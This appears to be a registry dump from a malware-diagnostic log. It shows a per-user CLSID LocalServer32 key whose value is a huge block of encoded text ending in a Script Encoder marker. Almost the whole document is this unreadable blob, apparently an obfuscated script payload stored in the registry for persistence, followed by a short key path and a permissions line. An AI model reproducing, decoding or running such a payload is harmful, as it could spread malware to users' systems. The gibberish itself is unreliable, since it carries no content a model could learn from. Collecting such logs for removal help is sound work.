L7p Yk889O\jA!?`,X#D}VwwCsavpZoDUxN2n Fn}`se.VB;jPInJ&4K]Vw1#t.p Vs[Z}Fq.4H?GsZ# 9y^^CCu4qI2s.}2sbto9s5`mqlP\Slq.D} 9h#TaWlioMp#VN^0Y(j!w/p8s.t!4^KwS}iwFIstA:j6l}h.}.^sulh[MNqsa]Lx6o9r}3B$4z,t]`}ej:"WK2w"#3tyt!wl#oKy+wBwf9Miq9o10wU}+4~rutxC:x&tTaZ}zOA1VjW^N.AUjx.IAHZj(g2}3wiVI&?wHK"Nk#iNal.1jlqHspqsj].I!ih9HNT]MIiq.\A.G:2^XrGIKt OZjjl|j#xAKwBf5V}~8TV pj9F}+H pTIN}!jM8Vj1p##jK+wV}8w3mFj?}A9x\"(Jy^n} 8IN`}D5j5SnsNap`Vq19BIlutqnx92i 4??otoIu5Z#jA2\ jWpjwd^:^1t!9xC3wIls1 nF.dCPVa?0s!H"4 Sf57]f"j8+4fIiBq4!H2jwwBIj8t}`..]M^: :ScJfg(l0sMU Fl}#I.I0Yjp#$KKi6d}3aCt"~F}TaWj#p7PNItUFAclZIZ8sAc wnC#w2}`a."f9h}+*nK096}UB;N%Vx}Vj.i w3m"owI36~C^}Jg!8?...g]29 } anFTxA58]A53H8j#9`+ A94iaA.PAoe(".e akNhq~4it\i`s$"K~jls%Sn2Ih#jjn]"~sN8o*qjs_jisNjqmA+i2`}TY~CM^I#qK\pUt&jf1aPj.2:jj5HoN5} 9X#j9x}+D?NZosUFA}q9t48NrHo2_4qAk]."\iVwkjseSKq}M^wjA5j\jlVI~P2^IHsw.}Vl|?_]A\VN\!t\psNH5iqASTI 8&5h[+8Ip+a`Hh,~tws%:wZN:t7}38ZC2xCi 4A}so}`jslj9sV}8IjpiXAjUwD}&9s] 4M.iH2Kf1;}`I(U&1X1GI~jFwKeL92tfxsKA#1"CNA}U.l?`Fd 1g}!w&]j"2#s^p.so_phVGCy1P5j92`9NPsj9Jy"!CTDK.oL j2FK}ss:mA3apzd8jVVV}&z*PV`Xl3s$j#s^j..p:3^?oN:tFjfC2D6\ Dw}2GXtKoZ8swD58si} 4K.TYSPf\r[q^IKu$\lp9Gis9o::XrIqVV#2ww]3xj#hx/}8(y" YG#Psh|2VU5iBo}qt~t 9tCsg?KP[2HqV0e^N5".ax.^1;#Fx.ijjkjsw*NGBS` ,HPi9jIsNB? 
HylPtU^!"rP#I\Iht~ ,AiApztFaIpbYVtj" i(5h}"\A+ t&mMN [o1;KjsH?ii2jh*d}Fgt[Vw/phX}}Vs;[ wp5"H?s%SPsA66swsepw;I82ZU!}:n3.t40s\?p#opPsI^f\w\hDx1#4qI F" :}(IFjMIZYw]V^A#L" HiZ\^$cmF.~JfNVHAY!K#$Zl"A"Jy"qC3DI1Vo^j#}n}`V}UkDsIZYI}.^Z}jlHP38!m`sq5.w_}#b2pH,./1hS+Il}jlhesTci#;}T9^^09t9!jY.q}~ xa3}j\}]%~M}Z#W`Ltqii9VKZF9K+}M1/,m]ygAtVXvNq\lj#V~nVY#5?OxIZVqtkD9]:l}}#xMK^42gFw0J+,Vp:pqIp[:1oAtF!jnPowqH+oxi1 iZt$\Fj&._N&HCjx^&w&jiXIHs[ 1:N.]!2Zpqw%l3(8jVF jVwHt3wZ?iiZI%tjHAhXjC4fp`o7}F\r#.w?isj522&5.V"^TYX4`V\pfoKm3s5}Kj9i94A.+1t}T.NP:t/`a.H.I~#3\I#j9\] wx0Osj!}_##9Mjj1UIq#&?h}"jMa98f4w1VX~}3V"6A5.5x^xjAG^VaMJywAiP"Arw(\IN"[q2WjbY*p+4A1otoCMwsC3wC}THA1i58^Vj*9!aZ4ZN~#2xL\gW]+9Wl0s;1FsmPoVGIZ1]ITXU}is.e9fjT\LpVXVpiVs\j}2m&9AHq6b]3"(t!l/t!t6K_[L"x1M}UNjps1H4qHg?#I8j!x|\P"C}ToD.V1V `sH\ 0c5`IW M^cP3w\i"~}?0[q1:I;]uNw+Vs-}TH}1sI"\38IthXK4ToH}VF~nj9z"MO5lw9;nK"*t 9&e"xSHZoI\ oW8"1+lAwf?i3llj,GnVwA^TwFH3a~?o.w]ytz9&\&}Z}+n.^.C af}%4rAB2mMNnHusNNZs3|To!1i6S# 9Z\P":#[2jUst6A9oU8W?`w j!4C]Mx2]3"jmZ[A5.bZjz,;H:}3j3o~1ooH C1D#p9Z133ZVw~jqI*53a;Nq*W[3W6 V1c}#gKIA2AgC}m[o1hK^9C.iBw?o.g[xA!CswDlVH&H360P:.$\M9ZI:A2^!jS#!\AC wA?2oZ939si#m7rA.Bj 4nK+wV}K"/]iafN+1gj%1$tZsFUX1p`qXiF"Z}3j2\3wIp^owqCNMP3VMjqI9jVoAKipX f~sPV9 phOHruNKeqN!1jw rV6Vt3x*]&aH8f&y1A3ytt2]TVspjq*?f[G}T1VijwD}hgV+ssm?9AAPswu2gHpjVG[!\\F!x1\!0cl0( `N5}i6b? Nspis4}TwDjjwpj wwIVoUKiY }sNo(&~wp^Nm8 X1j3xXJT^ZV0\"21xJ"bMHyoa+p\SK%NW}y^ICfg:r t;H#9K[G.9:fxnmZ}y\M^! 
3"Z#V"yps#21!.;63sxI 1eITt;4q.V#sx1nuxI}TOdl3}7CyFoIF\\H0FnP&4}ij^r[P";?`BL`jsI[!t$N21JlsBKIT9kP2wMj#xnphO~N+* ejsUU!jt?AYw\(jHH.Iy]3gL+b1|`&oX]UVjNZ}$I3#\K ,~e:l?C+xCNf# ppN~]`.rt XxoN;\2wEH(a}]+X&}q[Mq2p.}V}s4oIdjV[w}TwAe 8C!"C.pHxj#}~n_VtjLjD5NqXtF^A629.\"j&qX/9 9KihFNIZ}#4u]\.+1~ V`F\ogC.h4mIq} eyY95V~sIswb}jx:t!a&\Vlv58^F(.V_}#A~HqtzPBU1+1_}jlZ#"w;s4U}+1~}`V\gx&c}Z9jn3a:P(aS}i\KI`Bs9!s;]is~p0s$Kio~j#s~}."I}iwAI#4~pi}+}`s9gM9|poNKeF&h]VwK#h4s}2$.tF9l}T9~I`s$.#oU4+IoH.xl 9^&Voq+sVV] wCj!lx}`V}].ahe:8?]+w(NZHljK.KesNqp 13I")Sp 9!82jIn wrlio51V9~}`}$9!wqp858jVwsHs\?]i\I5j\F".wI}hVA4^}.PHnphHH^CxZ#TaL}i[GKVIZ}`}B".jsK^1q]sgs#X.j!DD5j[|3*q]h60wwqpV[k+!9_#:XkiiwlpT[oI3N;nVN4U2D.Ks,mijx;eKwr\ x.Hq4L5!w2 sIwlAs$I3qnji9q}Kwr]sjD.V1q4fV`}jsF`KjC5jtn[:\Y\4teiwwIVO!5j*H}is;.q*3pf[qpqIk#38I#ilKj"]w1#qHP2t!"&4/+G9Z}3ws}jO*[VA\js1M` sI]hV\I2tdpH2p#}}eLx?\ xsIhawi*ktA} 9wpI`}~]&4/ 3jHo0X. [2(V9Se%q81VY9N#o;NTwkj!8s]oa5KU2~KhYotw./q2wC4_.U M4/ (9Z 34E? $35F. 6o.~4.A]l3\8.Vto}:XLji&h.9sVK!Y~e0s/(sa5p`sq]F\*eV5*^!xylwoZ9F}MPs.xp0.+IiowIi*y 3j?\i\lV[;HVpSjswsjLjE50NV825Xj3Dl#TlD5j42\.sK#hI4.ystps2`jV}qij`XPq^fpq4;1Vs&]0mq5j^Ij.U#&T!\2^?j#w5j`O.tswli#NqK0sO+utNHs}x .gr6iwS?Vo\j YjCqY3`3\DIq}"#x~A}.a\tp9|5:B1:VV_8utbHVFmToKNf}KC2thjpjIIqB~K%sM[yWA9FwC?^}nC:j5i XA] 4M5.]D:2HPU}U.Zq.?V[;+3*g .4r\oxIIUsN4PVl}`s/I&^IjV"#.x(tVwXjsx/?salg2In}s}mlV9(.haU!t;#xaxis\5+qkN+5S}s**5x99myW.#yzc[Fwl#oaKps23\MYAt#.kNjwOS"]sIVV8C j5ihxZIPtUjomHCV63(jxxpsmZn2\ e39(}TX.I0]ktM68e#WS5qspp%tVjpsk}IDP!jAjia IPpy#`6HU4kp`Vg[!wA[x^SJ"\HH0sZ5jN2^+Y2H21UlVtgpis iZDfJTwXN+syjis~n^9-1 \xpZ*tt "x[x9f6i^sH0415j1K8h9t}Z9$?!dy?3sm}:9A}#9A!qo}qs;]_No5.wA`9"}(4}}(9A]igypNokKA4}UN_?`3Xps#q1+sxnfxn]iw1pi#m4fI&]0sHUFz\pZIA[VaS]s\eVwnlVoC\!s;}isypqI31+1+IhN"\F9p#i^sIo4^NTNV]VYtt!9fp^sq]OpH2"}]9xpS8ox"MN~}#s8Iy.Bp%]U?i1G}Vj.]sxI/0SN+t\CU%+9M4xw9gH2wp 3\.]pg\l0X6\!sgjfNGpqs}jhtmH9tGt2w2Co~fp%B;IP.oHNA.U3^II2I`CF^n}j"5#Vx\?24S\FAg}TVUjjWfr31NPAhi3w?th9L}U# m 
,q}`wTn!SDHw95H!w6].ak[i06NZoE9xsW}pVjpsNAhs~N%tkCM4It+lfNT3Wj/,G}^}/`s`6jbYG 2jD#3^IC3wf. 295V~}V.;I09h.#\ZNT6`jjDf}P^2V4S13Fw]wstUFAXro.b8F^rH2"1}VO;jq[}d ,"tq1UHAIG.oo"lqN"}LwV8iAX?"[~.ftSj`N6mM4pIZHX\!Ky}Lg2 o^ qT6}.w:#UVA?w}qPBm4hY; 38A8U9M.!q0l+s&\qN `T*pymSj!"I]M\s8o\xNBh\ ,GC!t0jytU5T3SI#V2 xaL8#& 5+[xji9n}q*6qM&y5.9}}!^l}V^f\p~Fl8Bk5FV"}is~4AFpjV]t}fNGiK~p\Vx.KhH~4qw&eZIff^FsFk^Fa&}:92}p~ElZB::26k]h1Aj2t]?io\IiF$t!wS}iaIph10?o92Py3*93gf. wt\!j3jKgr[saxpN$3t3}l s}Wls9$jh4NHT*ke&4&[+X&VoWms5.P:s6t2w&K8sjns".#Dn#i8&jwoImjFM#PV"l`w$j [;KV,:C&^r\!D&Kp[ H3Fj8A}6"K~&}0.n :OZ .9cnsa5?NB1"F}l8#Iwr:t$}3B"lhm8}j"An#w;jp]gI!6A}`.o92lC?sV}CKwf}j"LHoxfH`Bn".3X}iIMNZ*43BhI#2XHj5yiP"D3Bwpq5.^sVK`jaw}ws2CV95PLg3 3O1I:oYmx.~]h6+}8.- X4NT5W# DZ 9w; 22r!IK]A}/5Kw&`t\PV^v#:X|j3jAK`3h"VIV}V1K}AY/jVoM}3Yq[ 4r\!8IPs\+uAZ 01tq3w1VqS#3W! jw9i XD5^[.3w!j *mjqh*V[UN sN}."f}Vlf1ptN+oI28ws]`jxI`9.j.~j[sjpn3w5p^oM`c.tuIN0qTps[nm#VGCF"s}jRD|f[ Kq38} Np`!4Ipjssn(~vH21h\i&hIo[}(.N ^fNwpqN%?iB51+14i:DD}%4pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\dyt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9k%7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7JfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJz%WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf57SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SH,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H%-r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+Sz1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO 
J&1\[zR\1H1A`Z,yJfm7NH%-1z07NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7S"t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07Nr%7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7J&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJXRc}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&I\JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzR\r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO Sz1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z07NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7S"t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07Nr%7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7J2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJH%*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25-d!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fdXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXR\rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO SH,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H%7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7Jy4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[kR\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\J&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJXRc}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&I\JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzR\rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO SH1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO 
J&1\[zR\1H0\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\dyt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9k%7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7JfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJz%WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf57SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SH,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H%-r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+Sz1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z07NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7S"t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07Nr%7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7J&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJXRc}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&I\JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzR\r337|z%7];,3dXO rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO Sz1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z07NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7S"t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07Nr%7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7J2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJH%*5?RDSH,AJ!5\J&Ic}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25-d!wpS257[XO&JXR&JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fdXO&I;%2Jy4p6sz\FzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXR\rA27FXR\]ZO2JzO rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO SH,~iZO 
J&1\[zR\1H1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H%7[!5\HXRci94pSHd\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7Jy4AJXk\JT5\I;0\9Lt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[kR\}.z\[rO&S2^\dym7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\J&92J"1\rw)c`Z%MJfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJXRc}jRDSH12d!p7Jf5WpU%.Sz1ASTp7J&Ic}jRDSz1ASTp7J25*5?RDSH,AJ!5\J&I\JTwpS2e\9X,2Jz%2SZs}Sfe7Nz,2JXR&JTwpSfe7Nz,2JH%fd!wpS257[XO&JXR&JzO&I;0&dyt56ob7|H,fI/02S"t56sz\FzO&I/02S"t56wb-nXO&I;%2Jy4p6sz\FzR\rA3\nX%7]/,ASH,+r337|z%7]ZO2JzO r337|z%7];,3dXO rA27FXR\]ZO2JzO SH1A`Z,yJfm7NH%-1z1~j/,yJ&1\[zR\1z1~j/,yJ2m-9XR\1H,~iZO J&1\[zR\1H0\9!p7Hz%WjGt}Szd7NTp7HXRci94pSzd7NTp7HH%*`f4pSH/7[!5\HXRci94pSHd\dyt~Jz/7SZp-I/07N%t~JXk\JT5\I/07N%t~JH/-d!5\I;%7[L4AJXk\JT5\I;0\9k%7}#b7Nb,fSf^7S"m7}.z\[rO&Sf^7S"m7}jb-9kO&S2m7Jy1\}.z\[rO&S2^\dym7JfNAS.m-ro)Wj/%MJ&92J"1\ro)Wj/%MJ2N3dy1\rwbWiZRDJ&92J"1\rw)c`Z%MJzY~pU%.Sz1ASTp7J&Ic}jRcST]&lqI~[Zso5x9Sp09~[j92HC^A}+OsI0}F1j.K["twpq,Kp [\jT6wi(js] OSI![2?T} 8y1$"f"(Ist~t!8I]!w\8TwZ`1CmM,:]uN~KZs$+3#`pfNDj3x}8TwZ4qHxlfNjiyF]t2wAN21a}VxSe3"I\3ws}y1sm23yjht\K`s3N+1&m3Vh] 9\jTwA4+qUIssX#AIBt3wZ?q.W}V^YiMSFPiwA1`qSmMN"j t\5Zs$NqoG}+%Wj 1!#Tw2p sAph,XjVY45jxWNZFx]f"xjVws}p9A?Ao\IjN   s&p`s$?3#jjpN [F92C!Oypio IT.Kiq.!\FA IqN~j!aMHCwf}#jIV[A"!IA i,dp:Iap [~5i9;[ wM}P"}ITH~1V9~tys!5x9Ip2}~tjxptyxr]P".pZ4Igs9;]o2ZmZ.Gp+^Zp#N ns9\C TX?i#dpiw~HG9F5!xyKwsK[39q}j"AJfz\K;0*`KA~}is~4wma1uHIjfN~}j"}\3wApp2g}Ts~e`tjtMg242}tn.\vPfgs}iwAp`oAU2*y h*UH8Ve?haIIT*. 
.4rnsa5KhH\HUt+ejNjI jv52wU#Mg&PFj}VXj.0#nj2FZPV.x+j9PHiH"lTV2Ps"DH#w;5"#g+htwijId"3lqHq1b]y^; .9cnsa5?NBlq2V+P N~p`s$pioNH%VDt243C!gY.hH\HUtKe.16(Mt6+Vwbj2lh 3\cHqw.?:]nj2sli w"NAF343]"j"bS 89\VX.?PHhI#sZijIG"!ljl2N}n:XZP!jI\ \+_Hkt3*KeVt}4V1;haNlVFl}jws}iwApiB~pis~j^tV1MxYj ANC.\Leyg/nh5Xr:HrmV9N VNWmysurp20p".ktj9.}iwAp a0Hh68 0Ndja+_w^ 2Wh V1hnV8/+VOk"&t7e%1}HA6O.%]mjis~}j9s}iwAp%$b3s~ sN$5jwf.s9IC(43P2gnVwAp`oA5KAd]os7p`s$pion.UI^j!Ih8TaN!#d.%AS}`s$5jwqjN.N]F`* K&6CTaEsaL(3*Se%qZr`FP1u[n4i}S 35h8!g*hs0.+6. 0NjmM"C.:Vn 28Ye.9I6ia5Kqqkt!!ljst}}0weKioNNTs~}jges4;N!]h+#}b VwT\2O*.s9ICx"3P&^es4;NV]n.}+}is;ly9u+!1bHTcSPM8HoaIpU[bH+Ikey*6(Fa(+_1t8.I! VwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}j"L[!99}TwAp`oA5js~}is;}2Np?i\.Ki9a}(j;}#^x?io~pis~}`s$5jwCHZ9\t!X\[!99}"41pssA\!s~}is~p`s$piosmT}a}(\2}#^xK9]2ITVG}`s$5jwAp`s~}jg|[F99}zD1pssA\!I;  Nxp`s$pio~pis~}jK\}s^x?io2.TVG}ZF!mjwxp`s~}jwA}jwA}pIcIssA\ w;  NxjoNp?iH~pis~}jwA}iwAI!42.TVG]`F!mjwWl09\t!^A}jwA}iwAp`oA5.AG  NxoNp?iHxKi}a}9A}iwApio~pis~jZFFmjwwIA9\t!^\[F99}TwAp`oA5js~}is;I_NO?iHdKi}a}9A}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}#~1IssAmX,;  Nxp`s$pio0r3}a}9A}iwAp#]~pi1~}`s$5jw|A9\t!^A}jwA}pAcIssA\!s~}isA?2Np?iH~pis~}jR&}s^x?io~pis~]GtFmjwxp`s~}jA6[ 89}TwAp`oA"K1G  Nxp`s$pio~pis~}jwA}iwApio~pis~}`s/Usa5j0*b\V&6e39j#^(1qOk"F};}is~pjqz.%$j?3wy K~MCqaq?haNHTF~i.A `F"D.0Fgn3^Fi3jcPiwC1:$l"&t.P!FUmy9$pio~IT5SeLxD}#I6KpsI+VFlPVFj1 xAp^I:](45i.\ZjVXYj Hk5js~}i}}HV1dK%$NlT.~#L~/Pqg.1itqp".Me0Nf5jwAp0wb8Vx/e ZF8!"sK s}j!*H#stnm8s]psHjIi*:#3"I[#aC+uH~pis~#^t 1sasK Vm#!Ih V\r8!g5.sak(V9S #N2pqspH 4mHs}7e34A[#aC+uH~pis~i:9G(s0XNwI0#ywr .4Z[qa(j0[tj&tk}i}q.w9 ?Vt`4oV8 39c^TwApio"HTwk jtj(sx(1:94 2a e:Z68!xEj0Hk"yV$epN;p^9!VBjI Y+P0FC+xCNTo~pi9: ^NV"MxCrowm#("/t.wZ[hxC.o21mK.MeVN2p`s$pV]bH!68e.4?^o^(+u$^4#.~ `,U5jwAp`so}.9:}9A} ^vp`}c5&}~Cj%84o9%?![A?p}x#jkh^U^Aju4ar!tI#j.OUFx2lZNa}.wctM\tP9w\N^) "xN~}is;}jN2NVoaj#sl[2xA^%~fNV2hruA+js,+qxxsIq/7Cxa\tM\|]!1cI`#X`(}~tis\12N;j!AyNqVA[yg;tVAc?pB21!6_JZ,+jy\Ap`s~}jx:t 
gVPjR\SH1y: FX[iw.pZs$pf(ypis~}jwZ ix?NTH~piIS]AsB5jwM.Zh2j.~y]3^\}q\;jGB?m:hX}TVkKNtB}TBaooZnMD5JTwA|T^ZNT.~}`}6qM9qHH,~jO1PlIP ^DjosAI!IS}VFA}Z9$mVsU4T*k6jwfj#":1o$Zlqo7C:HAUjk\}.ml[XD28!ws}iw9.A22gMYI}#s~pqN(Hz1~?p1NPlI]u9VmT# }#b7J2m*5.x\IN3Mjjj9}jwfP/kyKq^h\?%H[fNVHA}B?!*7N+1~}jwp[+9L}iB~pis~tZted!wVNA6 F 5\HL~(]9"&jA(&9!YAHUN;HAcAN9$nHupS]Vj!\i8\?!*7S"tA}`3at28AIZ9W\2\s}jw2^UK!?V*\Lt~}iV&?ws]jio~I 9H].^q8rO&Kio~p#A2t.tV5LI&KZp8nL^qt!TyJTwqj`22g 1NPp1&m09KmTqgrpIDC(4&n 9Vj/1ANTs~]GNC"kR!pN27[!j262^ ]!1Dpj$xd N5t3soK^N$juBhI s;FXRci3wAp%$GKitH}0V}"2jFmy* jft\}j4IPh^&jos&\Nwjh57SZs$IuB;pj/.}3"|]+al}qB~jis~is,(g!jAI`9~jsx:CK~5H3kc}`eXtF9GCPH.NZ2*}i2I}pVt M\wjTgprieMIip7#V.XUj"Zr:22HC~rJ&jyC+9qHH1A5?/Hj3InHAI]|"BUI3V;[ jy]p9Vpi#Gr Vtts}2:sx:I;,Ut:^9j2"W]zRhG)h:!NAth}"?qVoHzOA1uV4J&I\J"Ihlf22I!tVJ.1]jM^Djo37P.aMJ&9A8/OAp`oA:jt }s.bm0Iu5iaUI3h2j:gAi3wAIo(Z?#AKt N}Ua.j`wGj.4At2xtP3"2?Za5\:Vtth}GIw9h}T# roVwi!^DPiTyuoA1qwVJ.IT:3gfN0VhJ!jpt ^qFzR\rqt(gCIVFT52? NUji3y.3}M8:IyJqghH"VM}Ts~}`s$`jwAp`s.]!^f}jwA}ijAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApPTb|PY(#qV;9ftX8F9(Z"\^fZh6z44j2sy9M.DJs984 I24 i!? *Zt(x\^ogVmUta5+..J0F41xgW5q696LaCt("2t XV}yo!\j}7^V}84s1Tl 1!j!,a8x"V^rTW}+3Tl+.H8s.dty&E}V6k(s\w^x"Fe Xpms1!\1ZFjhK}ypLp/4(pUVZt.DNpjX4.is!N9HHpU68jj^ENGHHp?X4#j^E[9tX8qNn?bK TV!NwATmsTa|j3aJ3^E[hOD}jL0m/hXH:5ztZSh+GpSJZ"\^Z0GFoDK+oH!\!!iU.!NVVO}jXx4UI^^:Ohi+jXNhsN}pH!Pqsz1 4t4w!+639V[2"V8!jx5o]V":,H]U.!52I24+X54+V![MjXF/4x5j$8m+.H\.q;\MX/qA148MX(Cl38f9pms1L5?3kF!N0qAbGTBlN!.(p.Z/ Tx*N!#((#!k 8.B(x5yH^!k Fj98x5y\sZ/8#9(xp.\s!aq;t8? XZjuIHp?0wFj0E? 
Xy4+Y^F;IAdZ"hSGbk\ZShFKD,e+w!5y4G6KY^n!VZB*#bJIn{l I!U`a_E~b+6~yx-)mEB!S8#p8mmY14`#`8)i^sK/+vbijxcoAA==^#~@

HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\

========= End of Reg: =========

===================================
Permissions for "HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}":

Owner: BUILTIN\Administrators

